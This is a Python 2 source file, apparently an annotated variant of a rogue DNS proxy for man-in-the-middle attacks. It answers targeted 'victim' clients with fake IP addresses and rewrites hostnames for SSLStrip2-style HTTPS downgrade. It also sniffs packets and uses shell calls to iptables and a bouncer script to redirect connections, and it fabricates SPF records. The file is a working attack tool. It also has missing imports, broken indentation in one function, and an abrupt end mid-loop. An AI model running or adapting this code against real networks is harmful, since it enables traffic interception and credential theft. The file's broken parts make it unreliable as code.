import argparse
# --- Runtime state and configuration tables -------------------------------
consultas = {}        # client IP -> last real IP we resolved for it (used by the sniffer)
spoof = {}            # host -> comma-separated IP(s) to answer with (spoof.cfg)
dominios = {}         # alert domain -> IP to answer with (domains.cfg)
transformation = {}   # hostname-prefix rewrites for SSLStrip2 (transform.cfg)
nospoof = []          # hosts that are never spoofed (nospoof.cfg)
nospoofto = []        # client IPs that always receive real answers (nospoofto.cfg)
victims = []          # when non-empty, only these clients are spoofed (victims.cfg)
LOGREQFILE = "dnslog.txt"
LOGSNIFFFILE = "snifflog.txt"
LOGALERTFILE = "dnsalert.txt"
RESOLVCONF = "resolv.conf"
victim_file = "victims.cfg"
nospoof_file = "nospoof.cfg"
nospoofto_file = "nospoofto.cfg"
specific_file = "spoof.cfg"
dominios_file = "domains.cfg"
transform_file = "transform.cfg"
parser = argparse.ArgumentParser()
# Typo fix in user-visible help text: "Fowarding" -> "Forwarding".
parser.add_argument("-N", "--noforward", help="DNS Forwarding OFF (default ON)", action="store_true")
parser.add_argument("-i", "--interface", help="Interface to use", default="eth0")
parser.add_argument("-u", "--ip1", help="First IP to add at the response", default=None)
parser.add_argument("-d", "--ip2", help="Second IP to add at the response", default=None)
parser.add_argument("-I", "--ips", help="List of IPs to add after ip1,ip2 separated with commas", default=None)
parser.add_argument("-S", "--silent", help="Silent mode", action="store_true")
parser.add_argument("-A", "--adminIP", help="Administrator IP for no filtering", default="192.168.0.1")
args = parser.parse_args()
debug = not args.silent
dev = args.interface
adminip = args.adminIP
ip1 = args.ip1
ip2 = args.ip2
Forward = not args.noforward
fake_ips = []
# Extra fake IPs appended after ip1/ip2 in spoofed answers.
if args.ips is not None:
    for ip in args.ips.split(","):
        fake_ips.append(ip)
Resolver = dns.resolver.Resolver()
######################
# GENERAL SECTION #
######################
def save_req(lfile, text):
    """Append `text` to the log file `lfile`, prefixed with a millisecond timestamp.

    Fixes: the parameter shadowed the builtin `str`; the file is now closed
    even if the write raises (context manager); unused `global` declarations
    (realip, ips) removed.
    """
    timestamp = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S.%f')[:-3]
    with open(lfile, "a") as f:
        f.write(timestamp + ' ' + text)
def SIGUSR1_handle(signalnum, frame):
    """SIGUSR1 handler: reload every config file and re-read resolv.conf."""
    global noserv
    global Resolver
    noserv = 0
    DEBUGLOG('Reconfiguring....')
    process_files()
    # Rebuild the upstream resolver from resolv.conf after the reload.
    Resolver.reset()
    Resolver.read_resolv_conf(RESOLVCONF)
    return
def _config_lines(path):
    """Yield the non-comment lines of a config file, always closing the file.

    Lines starting with '#' are skipped; using startswith (instead of
    indexing line[0]) never throws on an empty line.
    """
    cfg = open(path, 'r')
    try:
        for line in cfg:
            if line.startswith('#'):
                continue
            yield line
    finally:
        cfg.close()


def process_files():
    """(Re)load every configuration file into the module-level tables.

    All containers are cleared and refilled IN PLACE so that references held
    elsewhere stay valid. Note: `transformation` is never cleared (matching
    the original behavior).

    Fixes: six copy-pasted open/parse loops replaced by one helper that also
    closes each file even when parsing raises.
    """
    global nospoof
    global spoof
    global nospoof_file
    global specific_file
    global dominios_file
    global dominios
    global nospoofto_file
    global transform_file
    # Slice deletion keeps the same list objects alive for other references.
    del nospoof[:]
    del nospoofto[:]
    del victims[:]
    dominios.clear()
    spoof.clear()

    for line in _config_lines(nospoof_file):
        h = line.split()
        if len(h) > 0:
            DEBUGLOG('Non spoofing ' + h[0])
            nospoof.append(h[0])

    for line in _config_lines(victim_file):
        h = line.split()
        if len(h) > 0:
            DEBUGLOG('Spoofing only to ' + h[0])
            victims.append(h[0])

    for line in _config_lines(nospoofto_file):
        h = line.split()
        if len(h) > 0:
            DEBUGLOG('Non spoofing to ' + h[0])
            nospoofto.append(h[0])

    for line in _config_lines(specific_file):
        h = line.split()
        if len(h) > 1:
            DEBUGLOG('Specific host spoofing ' + h[0] + ' with ' + h[1])
            spoof[h[0]] = h[1]

    for line in _config_lines(dominios_file):
        h = line.split()
        if len(h) > 1:
            DEBUGLOG('Specific domain IP ' + h[0] + ' with ' + h[1])
            dominios[h[0]] = h[1]

    # transform.cfg lines are "from_host:to_host".
    for line in _config_lines(transform_file):
        line = line.rstrip()
        from_host = line.split(':')[0]
        to_host = line.split(':')[1]
        transformation[from_host] = to_host
    return
def DEBUGLOG(str):
global debug
if debug:
print str
return
def handler_msg(id):
    # Hook invoked when an alert-domain id is seen; currently a no-op.
    # The commented command shows the intended use: launch an external
    # script with the captured id.
    #os.popen('executeScript %s &'%id)
    return
######################
# SNIFFER SECTION #
######################
class ThreadSniffer(threading.Thread):
    """Background thread that runs the pcapy sniffer loop (go())."""

    def __init__(self):
        threading.Thread.__init__(self)

    def run(self):
        # Delegates straight to the module-level capture loop.
        #DEBUGLOG( self.getName(), " Sniffer Waiting connections....")
        go()
def go():
    """Open the capture device and sniff forever, feeding packets to parse_packet."""
    global ip1
    global dev
    # Capture only traffic addressed to ip1 that is not web traffic
    # (80/443) and that does not involve the administrator host.
    bpffilter = "dst host %s and not src host %s and !(tcp dst port 80 or tcp dst port 443) and (not host %s)" % (
        ip1, ip1, adminip)
    cap = pcapy.open_live(dev, 255, 1, 0)
    cap.setfilter(bpffilter)
    DEBUGLOG( "Starting sniffing in (%s = %s)...." % (dev, ip1))
    #start sniffing packets
    while True:
        try:
            (header, packet) = cap.next()
            parse_packet(packet)
        except:
            # NOTE(review): bare except keeps the loop alive through pcapy
            # timeouts/errors, but it also swallows KeyboardInterrupt.
            pass
        #DEBUGLOG( ('%s: captured %d bytes, truncated to %d bytes' %(datetime.datetime.now(), header.getlen(), header.getcaplen())))
#function to parse a packet
def parse_packet(packet):
    """Inspect one sniffed Ethernet frame.

    For TCP traffic coming from a client we previously answered (tracked in
    `consultas`), bounce the connection to the real IP via IPBouncer.sh and
    (re)install an iptables REJECT rule that resets the spoofed flow.
    Only IPv4 is handled; the UDP branch is intentionally disabled.
    """
    eth_length = 14
    eth_protocol = 8
    global ip1
    global consultas
    global ip2
    #Parse IP packets, IP Protocol number = 8
    if eth_protocol == 8:
        # Take the first 20 bytes after the Ethernet header as the IP header.
        ip_header = packet[eth_length:20 + eth_length]
        iph = unpack('!BBHHHBBH4s4s', ip_header)
        version_ihl = iph[0]
        #version = version_ihl >> 4
        ihl = version_ihl & 0xF
        iph_length = ihl * 4
        #ttl = iph[5]
        protocol = iph[6]
        s_addr = socket.inet_ntoa(iph[8])
        d_addr = socket.inet_ntoa(iph[9])
        #TCP protocol
        if protocol == 6:
            t = iph_length + eth_length
            tcp_header = packet[t:t + 20]
            tcph = unpack('!HHLLBBHHH', tcp_header)
            source_port = tcph[0]
            dest_port = tcph[1]
            # sequence = tcph[2]
            # acknowledgement = tcph[3]
            # doff_reserved = tcph[4]
            # tcph_length = doff_reserved >> 4
            # FIX: dict.has_key() is deprecated (and removed in Python 3);
            # use the `in` operator instead.
            if str(s_addr) in consultas:
                DEBUGLOG(' ==> Source Address : ' + str(s_addr) + ' * Destination Address : ' + str(d_addr))
                DEBUGLOG(' Source Port : ' + str(source_port) + ' * Dest Port : ' + str(dest_port))
                # Relay this flow to the real IP that was resolved earlier.
                comando = 'sh ./IPBouncer.sh %s %s %s %s' % (
                    ip2, str(dest_port), consultas[str(s_addr)], str(dest_port))
                os.system(comando)
                # Replace (delete, then re-add) the REJECT rule so the spoofed
                # connection to ip1 gets a TCP reset.
                comando = '/sbin/iptables -D INPUT -p tcp -d %s --dport %s -s %s --sport %s --j REJECT --reject-with tcp-reset' % (
                    ip1, str(dest_port), str(s_addr), str(source_port))
                os.system(comando)
                comando = '/sbin/iptables -A INPUT -p tcp -d %s --dport %s -s %s --sport %s --j REJECT --reject-with tcp-reset' % (
                    ip1, str(dest_port), str(s_addr), str(source_port))
                os.system(comando)
        #UDP packets
        elif protocol == 17:
            u = iph_length + eth_length
            # UDP parsing is intentionally disabled; kept for reference.
            #udph_length = 8
            #udp_header = packet[u:u + 8]
            #udph = unpack('!HHHH', udp_header)
            #source_port = udph[0]
            #dest_port = udph[1]
            #length = udph[2]
            #checksum = udph[3]
            #DEBUGLOG('Source Port : ' + str(source_port) + ' Dest Port : ' + str(dest_port) + ' Length : ' + str(length) + ' Checksum : ' + str(checksum))
            #h_size = eth_length + iph_length + udph_length
            #data_size = len(packet) - h_size
            #data = packet[h_size:]
######################
# DNS SECTION #
######################
def respuestas(name, type):
    """Resolve `name`/`type`, answering a fake IP for blacklisted ad hosts.

    Returns the resolver answer, the fake-block IP string for blacklisted
    hosts, or 0 on any resolver failure.
    """
    global Resolver
    DEBUGLOG('Query = ' + name + ' ' + type)
    string_q = name
    try:
        # BUG FIX: six entries were missing a trailing comma, so Python
        # silently concatenated adjacent string literals (for example
        # 'jadserve.postrelease.com' + 'ad.insightexpressai.com' fused into
        # one string), meaning NEITHER domain ever matched a request.
        black_list = [
            "partner.googleadservices.com", "rubiconproject.com", "shop.bbc.com",
            "www.googletagservices.com", "imp.admarketplace.net", "stats.g.doubleclick.net",
            "match.adsrvr.org", "ak.sail-horizon.com", "ads.pubmatic.com", "ss.symcd.com",
            "static.dynamicyield.com", "adage.com", "psaads-d.openx.net", "jadserve.postrelease.com",
            "ad.insightexpressai.com", "securepubads.g.doubleclick.net", "amazon-adsystem.com",
            "nextadvisor.com", "advertising.bbcworldwide.com", "na.ads.yahoo.com", "rmx.pxl.ace.advertising.com",
            "aimfar.solution.weborama.fr", "comet.yahoo.com", "geico.d1.sc.omtrdc", "ad.doubleclick.net",
            "securepubads.g.doubleclick.net", "cmap.ox.ace.advertising.com", "match.adsrvr.org",
            "pagead2.googlesyndication.com", "googleads.g.doubleclick.net", "tradex-d.openx.net",
            "rapidssl-ocsp.geotrust.com", "pagead2.googlesyndication.com", "securepubads.g.doubleclick.net",
            "us-east-1.dc.ads.linkedin.com", "pixel.advertising.com", "ox.ace.advertising.com",
            "fei.pro-market.net", "us.adserver.yahoo.com", "loadm.exelator.com", "load.s3.amazonaws.com",
            "adnxs.com", "cms.analytics.yahoo.com", "dsum-sec.casalemedia.com", "match.adsrvr.org",
            "pixel.moatads.com", "ads.rubiconproject.com", "aax.amazon-adsystem.com",
            "image2.pubmatic.com", "ads.yahoo.com", "s7.addthis.com", "www.adweek.com", "smartbriefcareers.silkroad.com",
            "adaptv.advertising.com", "advertising.bbcworldwide.com", "nbcudigitaladops.com",
            "dbg52463.moatads.com", "moatads.com", "ad.insightexpressai.com",
            "mnet-ad.net", "betrad.com", "loadm.exelator.com", "amazonaws.com", "godaddy.com", "pubmatic.com",
            "ads.linkedin.com", "geo.moatads.com", "usermatch.krxd.net",
            "t.co", "analytics.twitter.com", "ping.chartbeat.net", "match.adsrvr.org", "a.collective-media.net",
        ]
        # Substring-match every blacklist entry against the queried name.
        dummy = 0
        for site in black_list:
            if site in string_q:
                dummy = 1
                break
        if dummy == 1:
            # Blacklisted: answer with a fake blackhole address.
            answers = "192.168.000.003"
        else:
            # Otherwise forward the query to the real resolver.
            answers = Resolver.query(name, type)
    except Exception:
        DEBUGLOG('Exception...')
        return 0
    return answers
def requestHandler(address, message):
    """Handle one raw DNS request.

    Parses the wire-format message, dispatches on the query rdtype to the
    std_*_qry helpers, and sends the response back on the module-level UDP
    socket `s`. Requests for blacklisted ad/tracking hosts are not written
    to the request log.
    """
    resp = None
    dosleep = False
    try:
        # Python 2 str: the first two bytes carry the 16-bit DNS message id.
        message_id = ord(message[0]) * 256 + ord(message[1])
        DEBUGLOG('msg id = ' + str(message_id))
        if message_id in serving_ids:
            DEBUGLOG('I am already serving this request.')
            return
        serving_ids.append(message_id)
        DEBUGLOG('Client IP: ' + address[0])
        prov_ip = address[0]
        try:
            msg = dns.message.from_wire(message)
            try:
                op = msg.opcode()
                if op == 0:
                    # standard and inverse query
                    qs = msg.question
                    if len(qs) > 0:
                        q = qs[0]
                        DEBUGLOG('request is ' + str(q))
                        string_q = str(q)
                        # BUG FIX: six entries were missing a trailing comma,
                        # so adjacent literals were silently concatenated and
                        # the fused domains never matched any request.
                        black_list = [
                            "partner.googleadservices.com", "rubiconproject.com", "shop.bbc.com",
                            "www.googletagservices.com", "imp.admarketplace.net", "stats.g.doubleclick.net",
                            "match.adsrvr.org", "ak.sail-horizon.com", "ads.pubmatic.com", "ss.symcd.com",
                            "static.dynamicyield.com", "adage.com", "psaads-d.openx.net", "jadserve.postrelease.com",
                            "ad.insightexpressai.com", "securepubads.g.doubleclick.net", "amazon-adsystem.com",
                            "nextadvisor.com", "advertising.bbcworldwide.com", "na.ads.yahoo.com", "rmx.pxl.ace.advertising.com",
                            "aimfar.solution.weborama.fr", "comet.yahoo.com", "geico.d1.sc.omtrdc", "ad.doubleclick.net",
                            "securepubads.g.doubleclick.net", "cmap.ox.ace.advertising.com", "match.adsrvr.org",
                            "pagead2.googlesyndication.com", "googleads.g.doubleclick.net", "tradex-d.openx.net",
                            "rapidssl-ocsp.geotrust.com", "pagead2.googlesyndication.com", "securepubads.g.doubleclick.net",
                            "us-east-1.dc.ads.linkedin.com", "pixel.advertising.com", "ox.ace.advertising.com",
                            "fei.pro-market.net", "us.adserver.yahoo.com", "loadm.exelator.com", "load.s3.amazonaws.com",
                            "adnxs.com", "cms.analytics.yahoo.com", "dsum-sec.casalemedia.com", "match.adsrvr.org",
                            "pixel.moatads.com", "ads.rubiconproject.com", "aax.amazon-adsystem.com",
                            "image2.pubmatic.com", "ads.yahoo.com", "s7.addthis.com", "www.adweek.com", "smartbriefcareers.silkroad.com",
                            "adaptv.advertising.com", "advertising.bbcworldwide.com", "nbcudigitaladops.com",
                            "dbg52463.moatads.com", "moatads.com", "ad.insightexpressai.com",
                            "mnet-ad.net", "betrad.com", "loadm.exelator.com", "amazonaws.com", "godaddy.com", "pubmatic.com",
                            "ads.linkedin.com", "geo.moatads.com", "usermatch.krxd.net",
                            "t.co", "analytics.twitter.com", "ping.chartbeat.net", "match.adsrvr.org", "a.collective-media.net",
                        ]
                        # Substring-match every blacklist entry to the request.
                        dummy = 0
                        for site in black_list:
                            if site in string_q:
                                dummy = 1
                                break
                        if dummy != 1:
                            # Only non-blacklisted requests are logged.
                            save_req(LOGREQFILE, 'Client IP: ' + address[0] + ' request is ' + str(q) + "\n")
                        if q.rdtype == dns.rdatatype.A:
                            DEBUGLOG('Doing the A query....')
                            resp, dosleep = std_A_qry(msg, prov_ip)
                        elif q.rdtype == dns.rdatatype.PTR:
                            #DEBUGLOG('Doing the PTR query....')
                            resp = std_PTR_qry(msg)
                        elif q.rdtype == dns.rdatatype.MX:
                            DEBUGLOG('Doing the MX query....')
                            resp = std_MX_qry(msg)
                        elif q.rdtype == dns.rdatatype.TXT:
                            #DEBUGLOG('Doing the TXT query....')
                            resp = std_TXT_qry(msg)
                        elif q.rdtype == dns.rdatatype.AAAA:
                            #DEBUGLOG('Doing the AAAA query....')
                            resp = std_AAAA_qry(msg)
                        else:
                            # not implemented
                            resp = make_response(qry=msg, RCODE=4)  # RCODE = 4 Not Implemented
                else:
                    # not implemented
                    resp = make_response(qry=msg, RCODE=4)  # RCODE = 4 Not Implemented
            except Exception as e:
                DEBUGLOG('got ' + repr(e))
                resp = make_response(qry=msg, RCODE=2)  # RCODE = 2 Server Error
                DEBUGLOG('resp = ' + repr(resp.to_wire()))
        except Exception as e:
            DEBUGLOG('got ' + repr(e))
            resp = make_response(id=message_id, RCODE=1)  # RCODE = 1 Format Error
            DEBUGLOG('resp = ' + repr(resp.to_wire()))
    except Exception as e:
        # message was crap, not even the ID
        DEBUGLOG('got ' + repr(e))
    if resp:
        s.sendto(resp.to_wire(), address)
    if dosleep:
        sleep(1)  # Performance downgrade not tested yet
def std_PTR_qry(msg):
    """Answer a PTR query by forwarding it to the real resolver."""
    questions = msg.question
    DEBUGLOG(str(len(questions)) + ' questions.')
    iparpa = questions[0].to_text().split(' ', 1)[0]
    DEBUGLOG('Host: ' + iparpa)
    resp = make_response(qry=msg)
    hosts = respuestas(iparpa[:-1], 'PTR')
    # respuestas() signals failure by returning an int (0).
    if isinstance(hosts, numbers.Integral):
        DEBUGLOG('No host....')
        return make_response(qry=msg, RCODE=3)  # RCODE = 3 NXDOMAIN
    for entry in hosts:
        DEBUGLOG('Adding ' + entry.to_text())
        resp.answer.append(
            dns.rrset.from_text(iparpa, 1000, dns.rdataclass.IN, dns.rdatatype.PTR, entry.to_text()))
    return resp
def std_MX_qry(msg):
    """Answer an MX query. Currently ALWAYS returns NXDOMAIN.

    Everything after the first return is intentionally unreachable: MX
    forwarding was disabled ("Temporal disable MX responses") but the code
    was kept for when it is re-enabled.
    """
    qs = msg.question
    DEBUGLOG(str(len(qs)) + ' questions.')
    iparpa = qs[0].to_text().split(' ', 1)[0]
    DEBUGLOG('Host: ' + iparpa)
    resp = make_response(qry=msg, RCODE=3)  # RCODE = 3 NXDOMAIN
    return resp
    #Temporal disable MX responses
    resp = make_response(qry=msg)
    hosts = respuestas(iparpa[:-1], 'MX')
    if isinstance(hosts, numbers.Integral):
        DEBUGLOG('No host....')
        resp = make_response(qry=msg, RCODE=3)  # RCODE = 3 NXDOMAIN
        return resp
    for host in hosts:
        DEBUGLOG('Adding ' + host.to_text())
        rrset = dns.rrset.from_text(iparpa, 1000, dns.rdataclass.IN, dns.rdatatype.MX, host.to_text())
        resp.answer.append(rrset)
    return resp
def std_TXT_qry(msg):
    """Answer a TXT query.

    For configured alert domains a fake SPF record is fabricated (and the hit
    is logged to the alert file); everything else is forwarded to the real
    resolver.
    """
    qs = msg.question
    print str(len(qs)) + ' questions.'
    iparpa = qs[0].to_text().split(' ', 1)[0]
    print 'Host: ' + iparpa
    resp = make_response(qry=msg)
    host = iparpa[:-1]
    # Split off the domain part; host gets a leading dot so both the ".domain"
    # and ".full.host" keys of `dominios` can match.
    punto = host.find(".")
    dominio = host[punto:]
    host = "."+host
    spfresponse = ''
    if (dominio in dominios) or (host in dominios):
        ttl = 1
        DEBUGLOG('Alert domain! (TXT) ID: ' + host)
        # Here the HANDLE!
        #os.popen("python /yowsup/yowsup-cli -c /yowsup/config -s <number> \"Host %s\nIP %s\" > /dev/null &"%(id,prov_ip));
        save_req(LOGALERTFILE, 'Alert domain! (TXT) ID: ' + host+ '\n')
        # Fabricate an SPF answer pointing at the configured mail host.
        if host in dominios: spfresponse = "v=spf1 a:mail%s/24 mx -all "%host
        if dominio in dominios: spfresponse = "v=spf1 a:mail%s/24 mx -all "%dominio
        DEBUGLOG('Responding with SPF = ' + spfresponse)
        rrset = dns.rrset.from_text(iparpa, ttl, dns.rdataclass.IN, dns.rdatatype.TXT, spfresponse)
        resp.answer.append(rrset)
        return resp
    hosts = respuestas(iparpa[:-1], 'TXT')
    # respuestas() signals failure by returning an int (0).
    if isinstance(hosts, numbers.Integral):
        print 'No host....'
        resp = make_response(qry=msg, RCODE=3)  # RCODE = 3 NXDOMAIN
        return resp
    for host in hosts:
        print 'Adding ' + host.to_text()
        rrset = dns.rrset.from_text(iparpa, 1000, dns.rdataclass.IN, dns.rdatatype.TXT, host.to_text())
        resp.answer.append(rrset)
    return resp
def std_SPF_qry(msg):
    """Answer an SPF query by forwarding to the real resolver.

    The commented-out block mirrors std_TXT_qry's alert-domain handling and
    is kept for reference.
    """
    qs = msg.question
    print str(len(qs)) + ' questions.'
    iparpa = qs[0].to_text().split(' ', 1)[0]
    print 'Host: ' + iparpa
    resp = make_response(qry=msg)
    # host = iparpa[:-1]
    # punto = host.find(".")
    # dominio = host[punto:]
    # host = "."+host
    # if (dominio in dominios) or (host in dominios):
    #     ttl = 1
    #     DEBUGLOG('Alert domain! (TXT) ID: ' + host)
    #     # Here the HANDLE!
    #     #os.popen("python /yowsup/yowsup-cli -c /yowsup/config -s <number> \"Host %s\nIP %s\" > /dev/null &"%(id,prov_ip));
    #     save_req(LOGALERTFILE, 'Alert domain! (TXT) ID: ' + host+ '\n')
    #     if host in dominios: spfresponse = "v=spf1 a:mail%s/24 mx -all "%host
    #     if dominio in dominios: spfresponse = "v=spf1 a:mail%s/24 mx -all "%dominio
    #     DEBUGLOG('Responding with SPF = ' + spfresponse)
    #     rrset = dns.rrset.from_text(iparpa, ttl, dns.rdataclass.IN, dns.rdatatype.TXT, spfresponse)
    #     resp.answer.append(rrset)
    #     return resp
    hosts = respuestas(iparpa[:-1], 'SPF')
    # respuestas() signals failure by returning an int (0).
    if isinstance(hosts, numbers.Integral):
        print 'No host....'
        resp = make_response(qry=msg, RCODE=3)  # RCODE = 3 NXDOMAIN
        return resp
    for host in hosts:
        print 'Adding ' + host.to_text()
        rrset = dns.rrset.from_text(iparpa, 1000, dns.rdataclass.IN, dns.rdatatype.SPF, host.to_text())
        resp.answer.append(rrset)
    return resp
def std_AAAA_qry(msg):
    """Answer an AAAA query; NXDOMAIN whenever forwarding is disabled."""
    if not Forward:
        DEBUGLOG('No host....')
        return make_response(qry=msg, RCODE=3)  # RCODE = 3 NXDOMAIN
    questions = msg.question
    DEBUGLOG(str(len(questions)) + ' questions.')
    iparpa = questions[0].to_text().split(' ', 1)[0]
    DEBUGLOG('Host: ' + iparpa)
    resp = make_response(qry=msg)
    hosts = respuestas(iparpa[:-1], 'AAAA')
    # respuestas() signals failure by returning an int (0).
    if isinstance(hosts, numbers.Integral):
        DEBUGLOG('No host....')
        return make_response(qry=msg, RCODE=3)  # RCODE = 3 NXDOMAIN
    for entry in hosts:
        DEBUGLOG('Adding ' + entry.to_text())
        resp.answer.append(
            dns.rrset.from_text(iparpa, 1000, dns.rdataclass.IN, dns.rdatatype.AAAA, entry.to_text()))
    return resp
def std_A_qry(msg, prov_ip):
    """Answer an A query for client `prov_ip`.

    Returns (response, dosleep). Decision order per question:
      1. alert domains (`dominios`) -> configured IP (+ alert log/handler),
      2. exact ".host" match in `dominios` -> configured IP,
      3. resolve for real; apply SSLStrip2 host transformation on failure,
      4. spoofed hosts / injected fake IPs (ip1, ip2, fake_ips) when the
         client qualifies, otherwise the real answers.
    """
    global consultas
    global ip1
    global ip2
    global fake_ips
    dosleep = False
    qs = msg.question
    DEBUGLOG(str(len(qs)) + ' questions.')
    resp = make_response(qry=msg)
    for q in qs:
        qname = q.name.to_text()[:-1]
        DEBUGLOG('q name = ' + qname)
        host = qname.lower()
        dom1 = None
        dominio = None
        # dom1 = last label suffix (".tld"), dominio = last two labels.
        punto1 = host.rfind(".")
        punto2 = host.rfind(".", 0, punto1 - 1)
        if punto1 > -1:
            dom1 = host[punto1:]
        if punto2 > -1:
            dominio = host[punto2:]
        # punto = host.find(".")
        # dominio = host[punto:]
        if (dominio in dominios) or (dom1 in dominios):
            ttl = 1
            # `id` is the subdomain part used as the alert identifier.
            id = host[:punto2]
            if dom1 in dominios:
                id = host[:punto1]
                dominio = dom1
            if not id == 'www':
                DEBUGLOG('Alert domain! ID: ' + id)
                # Here the HANDLE!
                #os.popen("python /yowsup/yowsup-cli -c /yowsup/config -s <number> \"Host %s\nIP %s\" > /dev/null &"%(id,prov_ip));
                handler_msg(id)
                save_req(LOGALERTFILE, 'Alert domain! ID: ' + id + '\n')
            DEBUGLOG('Responding with IP = ' + dominios[dominio])
            rrset = dns.rrset.from_text(q.name, ttl, dns.rdataclass.IN, dns.rdatatype.A, dominios[dominio])
            resp.answer.append(rrset)
            return resp, dosleep
        # Exact ".host" entry in domains.cfg.
        if ".%s" % host in dominios:
            dominio = ".%s" % host
            ttl = 1
            DEBUGLOG('Responding with IP = ' + dominios[dominio])
            rrset = dns.rrset.from_text(q.name, ttl, dns.rdataclass.IN, dns.rdatatype.A, dominios[dominio])
            resp.answer.append(rrset)
            return resp, dosleep
        global ips
        ips = respuestas(qname.lower(), 'A')
        # Resolution failed (int result) and the host is not explicitly
        # spoofed: try the SSLStrip2 hostname transformation.
        if qname.lower() not in spoof and isinstance(ips, numbers.Integral):
            # SSLSTRIP2 transformation
            host2 = ''
            for from_host in transformation.keys():
                if host.startswith(from_host):
                    host2 = transformation[from_host] + host.split(from_host)[1]
                    break
            if host2 != '':
                DEBUGLOG('SSLStrip transforming host: %s => %s ...' % (host, host2))
                ips = respuestas(host2, 'A')
        #print '>>> Victim: %s Answer 0: %s'%(prov_ip,prov_resp)
        if isinstance(ips, numbers.Integral):
            DEBUGLOG('No host....')
            resp = make_response(qry=msg, RCODE=3)  # RCODE = 3 NXDOMAIN
            return resp, dosleep
        prov_resp = ips[0]
        # Remember the real IP for this client; the sniffer uses it later.
        consultas[prov_ip] = prov_resp
        ttl = 1
        # Spoof only when the host is spoofable, the client is not exempt,
        # and (if a victim list exists) the client is on it.
        if (host not in nospoof) and (prov_ip not in nospoofto) and (len(victims) == 0 or prov_ip in victims):
            if host in spoof:
                save_req(LOGREQFILE, '!!! Specific host (' + host + ') asked....\n')
                for spoof_ip in spoof[host].split(","):
                    DEBUGLOG('Adding fake IP = ' + spoof_ip)
                    rrset = dns.rrset.from_text(q.name, 1000, dns.rdataclass.IN, dns.rdatatype.A, spoof_ip)
                    resp.answer.append(rrset)
                return resp, dosleep
            elif Forward:
                consultas[prov_ip] = prov_resp
                #print 'DEBUG: Adding consultas[%s]=%s'%(prov_ip,prov_resp)
                if ip1 is not None:
                    rrset = dns.rrset.from_text(q.name, ttl, dns.rdataclass.IN, dns.rdatatype.A, ip1)
                    DEBUGLOG('Adding fake IP = ' + ip1)
                    resp.answer.append(rrset)
                if ip2 is not None:
                    #Sleep only when using global resquest matrix
                    dosleep = True
                    rrset = dns.rrset.from_text(q.name, ttl, dns.rdataclass.IN, dns.rdatatype.A, ip2)
                    DEBUGLOG('Adding fake IP = ' + ip2)
                    resp.answer.append(rrset)
                if len(fake_ips) > 0:
                    for fip in fake_ips:
                        rrset = dns.rrset.from_text(q.name, ttl, dns.rdataclass.IN, dns.rdatatype.A, fip)
                        DEBUGLOG('Adding fake IP = ' + fip)
                        resp.answer.append(rrset)
        # Non-forwarding mode: answer NXDOMAIN or only the fake IPs.
        if not Forward and prov_ip not in nospoofto:
            if len(fake_ips) == 0:
                DEBUGLOG('No forwarding....')
                resp = make_response(qry=msg, RCODE=3)  # RCODE = 3 NXDOMAIN
            elif len(fake_ips) > 0:
                DEBUGLOG('No forwarding (but adding fake IPs)...')
                for fip in fake_ips:
                    rrset = dns.rrset.from_text(q.name, ttl, dns.rdataclass.IN, dns.rdatatype.A, fip)
                    DEBUGLOG('Adding fake IP = ' + fip)
                    resp.answer.append(rrset)
            return resp, dosleep
        # Finally append the real answers after any injected fake IPs.
        global realip
        for realip in ips:
            DEBUGLOG('Adding real IP = ' + realip.to_text())
            # save_req(" " + "realip.to_text()"+"\n")
            rrset = dns.rrset.from_text(q.name, ttl, dns.rdataclass.IN, dns.rdatatype.A, realip.to_text())
            resp.answer.append(rrset)
    return resp, dosleep
# def std_A2_qry(msg):
# qs = msg.question
# DEBUGLOG(str(len(qs)) + ' questions.')
# iparpa = qs[0].to_text().split(' ',1)[0]
# print 'Host: '+ iparpa
# resp = make_response(qry=msg)
# rrset = dns.rrset.from_text(iparpa, 1000,dns.rdataclass.IN, dns.rdatatype.A, '4.4.45.4')
# resp.answer.append(rrset)
# return resp
def std_ASPOOF_qry(msg):
    """Build a spoofed A response: answer every question in the query with
    the IP address configured for that hostname in the global ``spoof`` map.

    msg -- parsed incoming dns.message query.
    Returns the dns.message response object.
    """
    global spoof
    qs = msg.question
    DEBUGLOG(str(len(qs)) + ' questions.')
    iparpa = qs[0].to_text().split(' ', 1)[0]
    DEBUGLOG('Host: ' + iparpa)
    resp = make_response(qry=msg)
    for q in qs:
        # Strip the trailing dot from the fully-qualified name.
        qname = q.name.to_text()[:-1]
        # BUGFIX: the ' to resolve ...' part used to be concatenated OUTSIDE
        # the DEBUGLOG() call, raising TypeError (NoneType + str) at runtime.
        DEBUGLOG('q name = ' + qname + ' to resolve ' + spoof[qname])
        rrset = dns.rrset.from_text(q.name, 1000, dns.rdataclass.IN, dns.rdatatype.A, spoof[qname])
        resp.answer.append(rrset)
    return resp
def make_response(qry=None, id=None, RCODE=0):
    # Build a DNS response either from an incoming query (qry) or from a raw
    # transaction id (id).  RCODE is the DNS response code to set
    # (0 = NOERROR, 3 = NXDOMAIN, ...).  Exactly one of qry/id must be given.
    if qry is None and id is None:
        raise Exception, 'bad use of make_response'
    if qry is None:
        # Response built from a bare transaction id: mark it as a response.
        resp = dns.message.Message(id)
        # QR = 1
        resp.flags |= dns.flags.QR
        # NOTE(review): only RCODE == 1 (FORMERR) is accepted on this path;
        # presumably intentional for malformed-query replies -- confirm.
        if RCODE != 1:
            raise Exception, 'bad use of make_response'
    else:
        resp = dns.message.make_response(qry)
    # Advertise the answer as authoritative with recursion available.
    resp.flags |= dns.flags.AA
    resp.flags |= dns.flags.RA
    resp.set_rcode(RCODE)
    return resp
# --- script entry: load config, bind UDP port 53 and serve DNS forever ---
process_files()
Resolver.reset()
Resolver.read_resolv_conf(RESOLVCONF)
# SIGUSR1 triggers a runtime re-read of the configuration files.
signal.signal(signal.SIGUSR1, SIGUSR1_handle)
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind(('', 53))
if Forward:
    DEBUGLOG('DNS Forwarding activado....')
else:
    DEBUGLOG('DNS Forwarding desactivado....')
DEBUGLOG('binded to UDP port 53.')
serving_ids = []
noserv = True
# The sniffer thread is only needed when both fake IPs are configured and
# real answers are also forwarded.
if ip1 is not None and ip2 is not None and Forward:
    sniff = ThreadSniffer()
    sniff.start()
while True:
    if noserv:
        DEBUGLOG('waiting requests.')
    try:
        message, address = s.recvfrom(1024)
        noserv = True
    except socket.error as (code, msg):
        # EINTR means a signal (e.g. SIGUSR1) interrupted recvfrom();
        # anything else is a real socket error.
        if code != errno.EINTR:
            raise
    if noserv:
